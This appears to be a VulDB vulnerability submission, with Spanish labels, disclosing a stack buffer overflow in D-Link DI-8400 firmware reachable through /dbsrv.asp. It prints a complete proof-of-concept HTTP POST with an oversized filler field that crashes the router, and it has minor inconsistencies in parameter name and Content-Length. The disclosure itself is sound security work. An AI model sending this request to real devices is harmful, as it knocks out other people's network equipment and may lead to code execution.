| Título | D-Link DI-8400 <=v16.07.26A1 Buffer Overflow |
|---|
| Descripción | A critical stack-based buffer overflow vulnerability has been identified in D-Link DI-8400 firmware version 16.07.26A1. The vulnerability is triggered via crafted HTTP POST requests to the /dbsrv.asp endpoint. Specifically, user-controlled input supplied through the src parameter is copied using the unsafe strcpy function without proper bounds checking, leading to a buffer overflow condition. Successful exploitation may allow an attacker to cause a denial of service condition or potentially achieve arbitrary code execution on the affected device.
POC:
POST /dbsrv.asp HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: wysLanguage=CN; userid=admin; gw_userid=admin,gw_passwd=E3A7F1B4C8D2E5F7A0B3C6D9E1F4A7B2
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
str=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbh |
|---|
| Fuente | ⚠️ https://github.com/666324/dlink-di8400-vuln/tree/main/dlink-di8400-vuln |
|---|
| Usuario | Zheng (UID 97999) |
|---|
| Sumisión | 2026-05-07 09:46 (hace 28 días) |
|---|
| Moderación | 2026-05-31 08:40 (24 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 367486 [D-Link DI-8400 hasta 16.07.26A1 /dbsrv.asp str desbordamiento de búfer] |
|---|
| Puntos | 20 |
|---|